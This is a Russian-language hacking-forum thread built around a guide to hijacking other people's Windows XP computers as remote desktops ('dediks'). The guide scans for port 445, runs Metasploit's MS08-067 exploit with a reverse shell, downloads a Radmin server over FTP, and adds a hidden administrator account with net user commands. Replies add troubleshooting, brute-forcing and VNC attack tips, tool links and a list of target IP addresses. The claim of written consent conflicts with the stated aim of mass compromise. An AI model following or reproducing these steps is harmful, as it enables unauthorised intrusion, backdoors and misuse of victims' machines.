Начну с того порядком уже надоело читать как люди ищут дедик , просят их , я уже писал , что мы ходим по этим дедикам , проксям и тд и тп .

Сегодня мы рассмотрим метод добычи дедика по средством Metasploit 3.2 с эксплойтом MS08-067_netapi который использует уязвимость в службе SMB на 445 порту , уязвимы все Windows XP Pro sp2 и sp3 , скачать Metasploit 3.2 можно от сюда http://www.metasploit.com/ , теперь скачаем сканер портов , я использую ip angry версии 2.21 она мне больше почему нравиться , офсайт http://www.angryziber.com/w/Download , предположим что всё это мы уже скачали и установлил , запускаем сканер портов отметив в сканере порт 445 , именно он нам очень нужен , если просканировав сеть вы не увидели наличие открытого 445 порта в этой сети делать нечего , если же такой порт имеется то это очень даже хорошо !

http://stopxaker.ru/imeg/445.png

Затем в Метасплойт в дальшейшем МС , находим эксплойт MS08-067_netapi жмём выполнить ,

http://stopxaker.ru/imeg/screen.png


Выбор цели Автомат , Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке Sessions появиться ip жертвы

http://stopxaker.ru/imeg/screen1.png



Предположим что FTP сервер у нас установлен и настроен , в cmd пишем


C:\>ftp
ftp> o
К 10.xx.xx.xx
Связь с 10.xx.xx.xx .
220 Welcome to 10.xx.xx.xx FTP service.
Пользователь (10.xx.xx.xx :(none)): anonymous
230 Login successful.
ftp>
Я настроил фтп на anonymous без пароля , ну вот мы зашли на свой фтп , смотрим где что у нас лежит командой

dir Видим что лежит наш уже приготовленный радмин-сервер sys.exe зальём его на комп жертвы

http://stopxaker.ru/imeg/2.png


get sys.exe
bye
Файл залит , выходим с фтп и возвращаемся а наш шелл

http://stopxaker.ru/imeg/3.png

смотрим залит ли файл

http://stopxaker.ru/imeg/4.png

и запускаем его


C:\>sys.exe

http://stopxaker.ru/imeg/5.png

Теперь запустим RadminViewer и пробуем приконектится к нашему залитому и запущенному радмин-серверу

http://stopxaker.ru/imeg/6.png

Замечательно конект есть , вбиваем наш пароль и вот мы дома :D

http://stopxaker.ru/imeg/7.png

Теперь в радмине выбираем режим "Передачи файлов и загружаем наш terminal.exe , который сделает нам дедик на этом компьютере , хотя можно сделать учётки и в ручную


cmd
net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
exit


http://stopxaker.ru/imeg/8.png

Далее радмином в режиме "Телнет " запустим наш terminal.exe

http://stopxaker.ru/imeg/9.png

Затем "Подключение к удаленному рабочему столу" и пробуем приконектимся к нашему свежеиспечёному дедику

http://stopxaker.ru/imeg/10.png

Как видите на скрине показанно , что если мы сейчас нажём "ДА" то админа может выкинуть из свой сессии , и он может заподозрить что то не ладное в своей системе , как правило это может , повторяют может лечиться перезагрузкой компьютера , но помогает не всегда ! 50/50

http://stopxaker.ru/imeg/11.png

Вы спросите почему я сразу не залил terminal.exe , отвечаю буквы в шелле отображаются кракозябрами и скорость в дедике сами понимаете , так что мне важно был залить радмина , а там уже дело техники
Ну вот у нас есть дедик , на нём мы может установить прокси , фпт и многое многое другое , примерно в течении часа получилось 5 дедиков , я думаю это не плохо !





ps: Всё тут написанное не претендует на статью , теперь от себя хочу сказать следующие этот метод всё равно требует времени и терпения , если кто то хочет жать на кнопку "применить в Местаслойте" и чтобы он вам выкидвал готовые деды , ИДЕТЕ ЛЕСОМ , дабы не сказать грубей !

Подробно про Метасплойт и эксплойты можно почитать тут http://www.metasploit.com/

про Terminal.exe здесь http://forum.antichat.ru/thread36042.html

Ну вроде теперь думаю отпадут вопросы , как и что , ищите сети со статистическими ip и дедиков будет в огромном количестве , а данной статейке лишний раз видно как уязвимы продукты Microsoft , поэтому я уже давно в качестве севера юзаю FreeBSD , а качестве десктопа Ubuntu (Linux Mint /etc) , думаю и другим пользователям пора уже сделать выводы !! В ходе эксперимента все данные пользователя не тронуты и на данное действие было дано его письменного согласие .

источник stopxaker.ru (http://stopxaker.ru/)

скачал,жму в поиске MS08-067_netapi говорит нету((

скачал,жму в поиске MS08-067_netapi говорит нету((

Есть, смотри внимательней "Metasploit 3.2>GUI>Exploits>Windows>SMB>MS08-067_netapi "

Ето так должно или у меня чето нетак???
Установил запуснил отклылся СМД и бегут строки0_о минут так 5 уже0_о
мне аж страшно))) если оно будет работать (метасплойт) выложу предложения как проще етим способом завладеть дедом) токо щас протестирую его)

скачал,жму в поиске MS08-067_netapi говорит нету((
ищи netapi )) Именно так я его нашёл

Ето так должно или у меня чето нетак???
Установил запуснил отклылся СМД и бегут строки0_о минут так 5 уже0_о


Так и должно быть , после этого запустить ruby.exe и откроется GUI

уже нашёл)всем спс.тока блин,уже полчаса сканю диапазоны - ни одного 445 порта...(

а если получил я шел как через него проксию установить???
или прогу какую кидать?

мож ктонить подскажет диапазончик,где 445 есть?

а если получил я шел как через него проксию установить???
или прогу какую кидать?
Юзай консольный сокc, инфа по теме:
http://vfose.hsdn.org/forum/viewtopic.php?f=8&t=266&sid=8b2e00d52d102173376fa7c19e8bfead
можно заюзать 3proxy http://3proxy.ru/download/

Так и должно быть , после этого запустить ruby.exe и откроется GUI
запускаю и ничего открываеться cmd и пусто

инфа хорошая,тока прога не качается от туда(

а если получил я шел как через него проксию установить???
или прогу какую кидать?

Блин я уже жалею что запостил эту статью :(

ну дурдом полный в аське такие вопросы задают что епанутся можно типо:

слышь, а на каком порту фтп работает ?
подскажи где взять радмина ?
как установить ФТП ?
а можно ему на комп пинча залить ? если можно скажи как ?



список буду пополнять :D


Люди у вы все сидите в интеренете !!! у вас под носом www.google.com по всем вопросам к нему > туда в www.google.com

нашел я тачки с портом 445
доходит до етого 23:53:58 - ms08_067_netapi Triggering the vulnerability...
и все(((

вот приблезительно такое всегда

23:53:42 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
23:53:44 - ms08_067_netapi Started reverse handler
23:53:46 - ms08_067_netapi Automatically detecting the target...
23:53:57 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:Russian
23:53:57 - ms08_067_netapi Selected Target: Windows XP SP2 Russian (NX)
23:53:58 - ms08_067_netapi Triggering the vulnerability...

и все жду 5 мин ничего непроисходит( че делать?

инфа хорошая,тока прога не качается от туда(

Какая прога ? от куда не качается ?

а и еще выбираю generic/shell_reverse_tcp
потому что generic/tcp/reverse shell ненашел( а етот похожый)

:D жесть парни))))в поиске всё есть.

стопхакер,не качается прога по ссылке что дал лебедь (прокся там).


кстати вот сдесь очень удобно смотреть диапазоны http://worldips.info/

:D жесть парни))))в поиске всё есть.

стопхакер,не качается прога по ссылке что дал лебедь (прокся там).


Найди CCProxy обработай ResHackoм , и будет тебе прокся , на готовый

CCPROXY (http://stopxaker-com.na.by/CCProxy.rar)

вот тут (http://stopxaker-com.na.by/soft_all.zip) в архиве soft_all.zip (радмин , terminal.exe и старый сплойт LSA )

проверил штук 20 айпи с открытым портом445 и пишет что то вроде этого "Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)"

проверил штук 20 айпи с открытым портом445 и пишет что то вроде этого "Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)"

Я об этом писал , что не все подряд будут хакаться с открытым 445 портом , нужно искать , причины могут быть следующие : установлена заплатка от этой уязвимости , стоит сторонний фаерволл , установлен KIS и тд и тп

ps : Я делаю так , нахожу сеть, делаю в ней дедик , а потом уже из этого деда работаю с этой сетью .

во я вроде нашел одного в сессии появляется его айпи нажимаю и открывается что то типа блокнота что делать?

во я вроде нашел одного в сессии появляется его айпи нажимаю и открывается что то типа блокнота что делать?

юзать)

во я вроде нашел одного в сессии появляется его айпи нажимаю и открывается что то типа блокнота что делать?

Это не типо "блокнота" это ты получил шелл , раньше он бы в чёрной оболочке , а сейчас в белой ;)

но у меня неработают нечего dir, cd c: и т.д

гм... а реально вместо radmina заюзать netcat? o_O

Could not determine the exact service pack - что это значит?

Could not determine the exact service pack - что это значит?
невозможно определить сервис пак о_О Мб не ХП вовсе ))

Не может определить "версию" винды . Какой пак т.е.

СТАТЬЯ РУЛЕЦ

Не может определить "версию" винды . Какой пак т.е.

Такое бывает , значит пропускаем и идём дальше , со временем рука набьётся и всё будет норм ;)

Делаю всё как написано

получаю

13:30:36 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
13:30:36 - ms08_067_netapi Started reverse handler
13:30:39 - ms08_067_netapi Automatically detecting the target...
13:30:51 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:Chinese - Traditional / Taiwan
13:30:51 - ms08_067_netapi Selected Target: Windows XP SP2 Chinese - Traditional / Taiwan (NX)
13:30:53 - ms08_067_netapi Triggering the vulnerability...

Это значит что нет уязвимости - или как ?

неплохо.спс автору,сижу стёбаюсь на ламерами в локалке ^_^

если вечером буду трезв то может сниму видео как юзать ^_^

молодец не плохая статья
много скриншотов все доходчиво и по теме
тока вот единственное Но это не описано как юзать сплойт под вин 2000
перезалейте тока прогу BHSocks5.v.1.1

вообщем такая проблема. Есть доступ к cmd , пытаюсь приконектится к фтп , спрашивает про юзера . Ввожу юзера и все - дальше висит. Не просит ни пароля , ничего. Как-бы залить файл по другому

вообщем такая проблема. Есть доступ к cmd , пытаюсь приконектится к фтп , спрашивает про юзера . Ввожу юзера и все - дальше висит. Не просит ни пароля , ничего. Как-бы залить файл по другому расшарь ему жесткий диск вродебы как то так net share c=c:>

вообщем такая проблема. Есть доступ к cmd , пытаюсь приконектится к фтп , спрашивает про юзера . Ввожу юзера и все - дальше висит. Не просит ни пароля , ничего. Как-бы залить файл по другому
Вобще-то он как-бэ спрашивается... вводи пароль (он не отображается и курсор тоже) и жми ввод.

Дайте мне кто-то ответ на моё сообщение то шо выше. Если не трудно.

Дайте мне кто-то ответ на моё сообщение то шо выше. Если не трудно.
да все верно только почему ты где то в тайване ищишь что уже всю россию про сканел

Так если всё правильно то - что дальше делать ?
Чего там где Ssesion не пявляеся IP ит дальше ?

Так если всё правильно то - что дальше делать ?
Чего там где Ssesion не пявляеся IP ит дальше ? просто эти серваки без этого бага ищи дальше

Так я их уже штук 40 проверил

Перед тем как все это ЗЛО осуществить, прочитайте статьи:
http://forum.antichat.ru/thread13658-radmin.html --- про Радмин
http://forum.antichat.ru/thread21599.html---- про метасплойт
http://forum.antichat.ru/thread77503.html ----про установку консольного прокси сервера
http://forum.antichat.ru/thread36042.html---- про файл terminal.exe

Так я их уже штук 40 проверил
Может фаер блочит?

Может фаер блочит?
неа, спрашивал :D
фаера нет=\

А в чём проблема - подкажите мож кто знает ?
:mad:

Перед тем как все это ЗЛО осуществить, прочитайте статьи:
http://forum.antichat.ru/thread13658-radmin.html --- про Радмин
http://forum.antichat.ru/thread21599.html---- про метасплойт
http://forum.antichat.ru/thread77503.html ----про установку консольного прокси сервера
http://forum.antichat.ru/thread36042.html---- про файл terminal.exe


и про установку и настройку FTP , 2 zeonx +

Никак не могу найти ИП с открытым 445((((
Плиз подскажите хоть страну в которой сканитьь :)

Росию))) я на полном серьезе)

stopxaker - дай ответ пожалуста на мой вопрос ?

BODOK

у меня тоже такая же проблема:
23:46:15 - ms08_067_netapi Started reverse handler
23:46:18 - ms08_067_netapi Automatically detecting the target...
23:46:27 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:****
23:46:27 - ms08_067_netapi Selected Target: Windows XP SP2 **** (NX)
23:46:28 - ms08_067_netapi Triggering the vulnerability...

мне кажется все таки это файрволл запрешает ! потаму что МС ждет приглашение от системы и не получает.
система уявима, но фаер не пускает.

stopxaker - дай ответ пожалуста на мой вопрос ?

Такое бывает , я уже писал , может стоит KIS может фаерволл стороний , возможно отключена служба "Принтеров и факсов" , 2 BODOK не зацикливайся иди дальше и обязательно получишь шелл ;)

stopxaker

Мне очень интересно этот баг с чем связано? в языкомов пакете, в службе "Принтеров и факсов" или в чем то еще? хотел подробно знать про этот баг!
и еще, данный даг на каких ОС работает ? (особо из серверных ОС). желательно по фактам.

Ещё попробовал штук 50 всяких - восновном Русских
И всё тоже самое.

У меня всё то же самое что у тебя - BODOK

BODOK
))) такая же фигня пока.
будем искат, пока не найдем БЕЗ фаера ))

BODOK
))) такая же фигня пока.
будем искат, пока не найдем БЕЗ фаера ))

Сколько уже можно искать ?

Сколько уже можно искать ?

вот ты знаешь , если честно, то ты один мне отписал , что у тебя проблемы с этим , были у людей траблы , но такого что прошел кучу сетей и не нашёл ни одного шелла НЕ БЫЛО !!!!

Пффф,да где такие лохи-то есть с 445-ым портом? Мне они лично не попадаются.

могу сказать только одно что если у тебя инет от городской сети то можешь даже и не париться врят ли что нибуть найдешь, только если у себя в сети) нужен выделенный ай пи тогда норм ищет

Велемир

есть, есть !
была сеть, что я сканировал с диапазоном 111.111.0.0 - 111.111.255.255 (это пример) и нашел 12 IP с открытом 445 портом. но 6 из них на линуксе был, один на VISTA, 3 na w2k3 R2 и 2 win XP SP2. и по закону подлости - без уязвимостей.

P.S. Вот, специально для тебе нашел такой диападон:
сканируй сам и смотри, что есть: 217.162.0.0 - 217.162.255.255. здесь я обнаружил 5 таких IP.
но нало того что стоит SP3, но еще и фаером закрыт. результат:
18:59:18 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
18:59:20 - ms08_067_netapi Started reverse handler
18:59:21 - ms08_067_netapi Automatically detecting the target...
18:59:29 - ms08_067_netapi Fingerprint: Windows XP Service Pack 3 - lang:German
18:59:29 - ms08_067_netapi Selected Target: Windows XP SP3 German (NX)
18:59:30 - ms08_067_netapi Triggering the vulnerability...

С чего ты взял?)))адресовано ноу нэйму )

Да уж... вот меня слово городской пров смущает ).Какие ещё бывают ?))))))))

я уже отписывал , но отпишу ещё раз , ситуация такая , допустим в своей областной локалке раньше было куча открытых с 445 портом , теперь ситуация другая сканирую ip angry пишет что ни один не открыт , сканирую nmapoм пишет что открыты но 445/tcp filtered microsoft-ds (то есть они открыты но фильтруются фаерволлом ) значит я так думаю это дело рук провайдера (если не прав , да поправят меня Гуру ) , теперь нашёл в инете другую сеть сканирую сканером ip angry выдаёт что все закрыты , не буду в даваться в подробности , проник в эту сеть , сканирую из дедика эту же сетку , 445 открыт и через одного !!!! пробую сканить из этого деда другие сети в инете , в одной все закрыты , в другой есть открытые , вот такая ситуация , приходиться лавировать , имхо дело в провайдерах , если не прав Гуру или знающие поясните в чём дело !?!?!

Может постоянно диапазоны не те сканю ?

Тогда я без понятия,ибоу нашего прова походу даже NAT не стоит )

Два дня у меня на это ушло - никак не могу добится своего ?

+1,молодец

А конкретно на каких узлах открыт 445-ый порт ?А то сканить всю подсеть долго,а проверить надо )

я хочет узнать: хоть у кого-то получился приникатся в сеть таким образом, как писал TC? может у автора из дедика получился ?
иногда мне приходится мысли, что это какая-то чушь. из миллион может 1-2 имеет эту уязвимость... :(
я серьезно говорю, если у кого-то получился - пишите, чтоб заряжался надеждой :)))

Вот ты знаеш если честно то я в этой теме мало людей встречал - что бы они дедами таким способом розжились.

ЗНачит так , этот способ не является панацеей массового взлома компов и делания дедиков , если ты не веришь что этот способ работает и хочешь меня обвинить что я тут прогнал фуфло , ты тоже ошибаешься , выбираем время , списываем в аське , я нахожу дедик ставлю там Метасплойт и всё остальное , получаю шелл стучу тебе в аську , даю ip дедика ты заходишь и смотришь всё САМ !!!

У кого останаливается на Triggering the vulnerability... или фаер блочит или не канает(патч), также может быть если вы стоите за НАТом , надо порт форвардить (если АДСЛ). И вообще используйте другие начинки, а не зацикливаетесь на одной. Можно хттп туннель замутить, или vnc начинку исп-ть (самая мощная начинка).

stopxaker - извини я всё поисправлял

ЗНачит так , этот способ не является панацеей массового взлома компов и делания дедиков , если ты не веришь что этот способ работает и хочешь меня обвинить что я тут прогнал фуфло , ты тоже ошибаешься , выбираем время , списываем в аське , я нахожу дедик ставлю там Метасплойт и всё остальное , получаю шелл стучу тебе в аську , даю ip дедика ты заходишь и смотришь всё САМ !!!
Да не stopxaker способ добычи деда ты реальный предложил, за статью +

я хочет узнать: хоть у кого-то получился приникатся в сеть таким образом, как писал TC? может у автора из дедика получился ?
иногда мне приходится мысли, что это какая-то чушь. из миллион может 1-2 имеет эту уязвимость... :(
я серьезно говорю, если у кого-то получился - пишите, чтоб заряжался надеждой :)))
ну не из миллиона 1-2 а из 100 у меня получалось и в сети и в инет, правда нужен выделеный айпи с него легче искать и больше

no_name
че то не понял? я говорю получился проникновение таким способом, как написал stopxaker ?

----

также может быть если вы стоите за НАТом , надо порт форвардить (если АДСЛ)
ксатати, может быть ! может ремапинг настроить на роутере? я вот за НТом сижу. АДСЛ.
просто вот не понимаю.. происходит обратное соединение, чтоли, что надо ремапинг создать? ведь локальный шелл хочет подключится к удаленному, а не удаленный к нашему. или я не прав?

давайте обсудим этот момент.

Всё реально - работает на 100% . Всё показал . Большое stopxaker спасибо .

BODOK
че реально? с Triggering the vulnerability _ом разобрался ? поделись.

BODOK
че реально? с Triggering the vulnerability _ом разобрался ? поделись.

Отвечу за него , бывать что выдаёт Triggering the vulnerability и выпадет в шелл , бывает что нет , не зацикливаюсь пробуй дальше .

stopxaker
помоги разобратся, 3 диапазона просканил через ангри ип. все лампочки либо синие либо красные зеленых не одной. причём один диапазон взял с первой страницы где ты закрасить забыл). но и там ни одного порта нет 445.

Отличная статейка, какраз дед нужен :)

stopxaker
помоги разобратся, 3 диапазона просканил через ангри ип. все лампочки либо синие либо красные зеленых не одной. причём один диапазон взял с первой страницы где ты закрасить забыл). но и там ни одного порта нет 445.

читай внимательнее я уже про это писал :



я уже отписывал , но отпишу ещё раз , ситуация такая , допустим в своей областной локалке раньше было куча открытых с 445 портом , теперь ситуация другая сканирую ip angry пишет что ни один не открыт , сканирую nmapoм пишет что открыты но 445/tcp filtered microsoft-ds (то есть они открыты но фильтруются фаерволлом ) значит я так думаю это дело рук провайдера (если не прав , да поправят меня Гуру ) , теперь нашёл в инете другую сеть сканирую сканером ip angry выдаёт что все закрыты , не буду в даваться в подробности , проник в эту сеть , сканирую из дедика эту же сетку , 445 открыт и через одного !!!! пробую сканить из этого деда другие сети в инете , в одной все закрыты , в другой есть открытые , вот такая ситуация , приходиться лавировать , имхо дело в провайдерах , если не прав Гуру или знающие поясните в чём дело !?!?!

Сорь не заметил

Так вот вопрос...
Запускаю МС GUI, появляться картинка типа идёт загрузка, при этом процесс отнимает у системы одно ядро и 2 гб оперы, повесит секунд 30 и исчезает... после этого нечего не открывается(всмысле сам МС) и процесс исчезает....в чем проблема ?
----
Решил проблему, поставил вин 2к на виртуалку :D

stopxaker
Как друг, можешь мне в личку кидать один IP(на который у тебя шелл подключается), чтоб пробовать с моего компа через метасплоит подключается или нет? может проблема у меня, что я за NAT_ом сижу или что то еще?
обешаю, не опубликовать и ничего не делать в дедике. просто как появится шелл - сразу закроюсь.

stopxaker
Как друг, можешь мне в личку кидать один IP(на который у тебя шелл подключается), чтоб пробовать с моего компа через метасплоит подключается или нет? может проблема у меня, что я за NAT_ом сижу или что то еще?
обешаю, не опубликовать и ничего не делать в дедике. просто как появится шелл - сразу закроюсь.

Добро , как только будет , тут же отпишу и кину в ПМ скрин , не вопрос ;)

2 B1t.exe смотри в ПМ , там скрин на котором в данный момент висит шелл

stopxaker

спасибо конечно, но это не то, что я хотел. я хотел со своего проверить. ну и ладно, вот со скрина взял тот IP, на которого ты подключился и результат:
22:54:59 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
22:55:01 - ms08_067_netapi Started reverse handler
22:55:11 - ms08_067_netapi [-] Exploit failed: The connection timed out (**.**.171.11:445).
а вообше у тебя там другой порт. т.е. место 445 другой (не пишу здесь какой).

stopxaker

спасибо конечно, но это не то, что я хотел. я хотел со своего проверить. ну и ладно, вот со скрина взял тот IP, на которого ты подключился и результат:

а вообше у тебя там другой порт. т.е. место 445 другой (не пишу здесь какой).


порт там у меня 4444 это LPORT , а по поводу

22:55:11 - ms08_067_netapi [-] Exploit failed: The connection timed out (**.**.171.11:445).

Можешь со своего компа даже больше и не пробывать , я с такой же байдой месяц промыкался :( , и всем остальным пишу !!! Люди пока у вас сканер не покажет реально что открыт 445 порт как на моём скрине , даже и не дёргайтесь !!! Ищите сети в которых будет открыт это 445 порт , в аську не стучите , таких сетей не знаю , ищите сами !

stopxaker
сканирую сканером ip angry выдаёт что все закрыты , не буду в даваться в подробности , проник в эту сеть
можешь пожалуйста поподробней описать как ты туда проник, и вабще непонял немного если провы всё блокируют то по твоему способу ничего не получится сделать???

stopxaker

вообшето там у тебя 2526 порт был, но это уже не важно.
У тебя щас есть такой IP, по которому реально подключится через шелл по 445 порту? я в цельях убеждений, что у меня все в порядке!?

всё работает из сотни насканеных компов штук 20 с открытым портом 445 из этих 20 штук 15 уязвимы. НО при попытке соединения по ftp всё застревает на проверке имени пользователя сначала думал что остальное не отображается пробовал вводить пароль и дальше команды но скачка не идёт. что делать в этом случае? может использовать другой пэйлоад?

всё работает из сотни насканеных компов штук 20 с открытым портом 445 из этих 20 штук 15 уязвимы. НО при попытке соединения по ftp всё застревает на проверке имени пользователя сначала думал что остальное не отображается пробовал вводить пароль и дальше команды но скачка не идёт. что делать в этом случае? может использовать другой пэйлоад?

Так по поводу ftp , я уже писал , что фтп я настроил под anonymous без пароля , подошёл только такой способ , с паролями происходит висяк , тем боле на фиг нужен пароль , если всё равно фтп на дедике поднимать :

http://stopxaker-com.na.by/images/ftp.png

всё работает из сотни насканеных компов штук 20 с открытым портом 445 из этих 20 штук 15 уязвимы

Такое было когда был юзабельным LSA сплойт , в данном случае , из 20 компов на 3 если повезёт 5 можно поймать шелл :)

дак когда anonymous всеравно требует мэйл в качестве пароля.
проверил нащёт Triggering the vulnerability у жертвы в это время выскакивает сообщение об ошибке с запросом отправить отчёт об ошибке после чего комп жоска виснет.

отлично работает ! :) Спасибки вам! :*

дак когда anonymous всеравно требует мэйл в качестве пароля.
проверил нащёт Triggering the vulnerability у жертвы в это время выскакивает сообщение об ошибке с запросом отправить отчёт об ошибке после чего комп жоска виснет.
tftp в этих случаях может помочь, можешь взять здесь (http://tftpd32.jounin.net) , если стоишь за натом открывай порт 66, в cmd пишешь tftp -i tvoi-ip-adress get fail.exe , -этот способ более удобный. У кого останаливается trigerring vulnerability.. сделайте порт форвардинг на 4444 порт(если вы стоите за НАТ), вырубите все фаеры у себя. Начинки **/http (через 80 порт), vnc, dllinject более реальные используйте их.

всё работает из сотни насканеных компов штук 20 с открытым портом 445 из этих 20 штук 15 уязвимы. НО при попытке соединения по ftp всё застревает на проверке имени пользователя сначала думал что остальное не отображается пробовал вводить пароль и дальше команды но скачка не идёт. что делать в этом случае? может использовать другой пэйлоад?
Открываешь cmd и пишешь одной строчкой ftp -n xxx.xxx.xxx.xxx . ххх- айпи твоего фтп.

Так, нашел хороший диапазон, для тех кто хочет проверить свои силы. Кидаю в ПМ. Просить тоже в ПМ)

наконец нашёл способ! ftp -A ip сервера буква нужна большая потому что -a и -A это разные ключи.

Хех...большая буква и маленькая буква - разные. Всегда помните, а то люди иногда зря ругаются на глючность программы, перепутав регистр букв ;D

zeonx
У кого останаливается trigerring vulnerability.. сделайте порт форвардинг на 4444 порт(если вы стоите за НАТ), вырубите все фаеры у себя. Начинки **/http (через 80 порт), vnc, dllinject более реальные используйте их.
так, уже лучше. но не 100% :) значит если я сижу за натом, мне надо в adsl модеме делать потфорвардинг 4444 порта (ненадо 445 тоже ?), отключаю все фаеры у себя. а потом? вот про начинки, не понял .. да и причем тут vnc и dllinject ?
этот момент пиши подробно.

zeonx

так, уже лучше. но не 100% :) значит если я сижу за натом, мне надо в adsl модеме делать потфорвардинг 4444 порта (ненадо 445 тоже ?), отключаю все фаеры у себя. а потом? вот про начинки, не понял .. да и причем тут vnc и dllinject ?
этот момент пиши подробно.
У тебя открыт должен быть порт 4444 , чтоб ты через него коннект делал , 445 должен быть открыт на дедике , чтоб туда коннект делать.
По поводу начинки. Нужно сначала найти открытый порт 445 ,а потом уже выбирать либо смд пытаться открыть либо что-то другое через этот порт.

Если вы сканите большой диапазон , то сканьте так же порты 139,3389,4899,5900. Многие деды поддаются либо багу vnc , либо бруту на порт 139. 4489 - порт радмина , может тоже понадобится.

после появления данного руководства,мой фаер стал постоянно орать - "попытка сканирования портов,узел ...... заблокирован" ))))и такое раз по 10 в день,во народ активизировался)

nepster

+2
У тебя открыт должен быть порт 4444
так, че-то не понимаю. что за порт это и как его ручным открыть? он же должен автоматом открытся по требованию, если отключить фает? только переброс на роутере - не поможет?
Если вы сканите большой диапазон , то сканьте так же порты 139,3389,4489,5900
вот 3389 знаю, что можно брутить например брутером brute_by_spayder, а про остальных ничего незнаю. что за критические порты? и чем их брутить?
4489 - радминовский.. с этим ничего, у меня даже видео есть, обычный алгоримт, как перебор по RDP(3389).
а вот 139, 5900... пожалуйся, подробно что за порты и что за уязвимость... (способы взлома)

nepster

+2

так, че-то не понимаю. что за порт это и как его ручным открыть? он же должен автоматом открытся по требованию, если отключить фает? только переброс на роутере - не поможет?

вот 3389 знаю, что можно брутить например брутером brute_by_spayder, а про остальных ничего незнаю. что за критические порты? и чем их брутить?
4489 - радминовский.. с этим ничего, у меня даже видео есть, обычный алгоримт, как перебор по RDP(3389).
а вот 139, 5900... пожалуйся, подробно что за порты и что за уязвимость... (способы взлома)


3389 - порт удаленного администрирования (вроде так) . Если он открыт , то можно сделать коннект к удаленному рабочему столу. Но если учетка с паролем , то придется искать пароль , а там 5 попыток всего лишь.
139 - через этот порт можно брутить пароли к учеткам , но только тогда когда открыт и 139 и 3389. Т.е. через 139 порт идет брут порта 3389. Если все пройдет - получите учетку , либо телнет.
5900 - vnc уязвимость. Есть программа VncMass . Она делает коннект к порту 5900 и если уязвимость есть ,то получаем удаленный рабочий стол. А там уже и порт открыть и учетку сделать легко.

zeonx

так, уже лучше. но не 100% :) значит если я сижу за натом, мне надо в adsl модеме делать потфорвардинг 4444 порта (ненадо 445 тоже ?), отключаю все фаеры у себя. а потом? вот про начинки, не понял .. да и причем тут vnc и dllinject ?
этот момент пиши подробно.

http://forum.antichat.ru/thread38434.html вот почитай, пор внцинжект, про баги внц баги поищи по форуму. Перекинь все порты(445,4899,3389,5900,139,135), тогда уж точно проканает.

Не выдержал лыхои доли :))) Видимо подпояли тебя :)! Я тебевчерав асю отписался :) Так что ты прочитай :)

trigerring vulnerability...

За натом не сижу, фаервол отключен. Кхм...

Не совсем в тему, но все-таки многим поможет.
Диапазоны IP-адресов (http://www.proxyserverprivacy.com/ipaddress_range.php)
Кстати, у меня нет внешнего IP-адреса, сижу за NAT'ом провайдерским, и вроде все ок ;)

Плиз подскажите в чом беда

17:16:45 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
17:16:46 - ms08_067_netapi Automatically detecting the target...
17:16:46 - ms08_067_netapi Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown
17:16:46 - ms08_067_netapi Could not determine the exact language pack

Неопределяется язык как я понял!

Плиз подскажите в чом беда

17:16:45 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
17:16:46 - ms08_067_netapi Automatically detecting the target...
17:16:46 - ms08_067_netapi Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown
17:16:46 - ms08_067_netapi Could not determine the exact language pack

Неопределяется язык как я понял!
угу. если знаеш язык то попробуй в настройках поставить не автоматическое определение а вручную выбери.

NiGHt-LEshiY

Скинь мне один IP в личку, где открыт 445 порт и с метасплойта могу получить шелл.
хочу проверить у меня все в порядке или нет ?

Плиз подскажите в чом беда

17:16:45 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
17:16:46 - ms08_067_netapi Automatically detecting the target...
17:16:46 - ms08_067_netapi Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown
17:16:46 - ms08_067_netapi Could not determine the exact language pack

Неопределяется язык как я понял!


Версию ОS посмотр: 17:16:46 - ms08_067_netapi Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown

ms08_067_netapi только под ХР sp 2 , sp3

А для Windows 2003 R2 Service Pack 2 есть эксплоиты?

google.com
или поиск по форуму. Тут вроде как обсуждается windows xp

google.com
или поиск по форуму. Тут вроде как обсуждается windows xp
Тут обсуждается Metasploit .

Да, но уязвимы то только XP...Поэтому они косвенно обсуждаются, но никак не WinServer 2003

Вот
19:50:48 - Initialized the Metasploit Framework GUI.
19:51:38 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
19:51:39 - ms08_067_netapi Started reverse handler
19:51:42 - ms08_067_netapi Automatically detecting the target...
19:51:54 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:English
19:51:54 - ms08_067_netapi Selected Target: Windows XP SP2 English (NX)
19:51:55 - ms08_067_netapi Triggering the vulnerability...
Жду уже минут 20 и нечего непоявляется тута в чом проблема?

Вот
19:50:48 - Initialized the Metasploit Framework GUI.
19:51:38 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
19:51:39 - ms08_067_netapi Started reverse handler
19:51:42 - ms08_067_netapi Automatically detecting the target...
19:51:54 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:English
19:51:54 - ms08_067_netapi Selected Target: Windows XP SP2 English (NX)
19:51:55 - ms08_067_netapi Triggering the vulnerability...
Жду уже минут 20 и нечего непоявляется тута в чом проблема?
Скорее всего дело в том , что не может приконектится. Сейчас проверку делали. У одного находит порт 445 , у другого нет. Пока что узнаем в чем дело.

89.41.58.125
89.41.58.141
89.41.58.185
89.41.58.186
89.41.58.220
89.41.58.117

Вот ипы если что!

89.41.58.125
89.41.58.141
89.41.58.185
89.41.58.186
89.41.58.220
89.41.58.117

Вот ипы если что!
С открытым 445?

nepster, да...

upd;
Останавликается там же где и у
diman19911...

Да и+ тама хр сервис пак 2

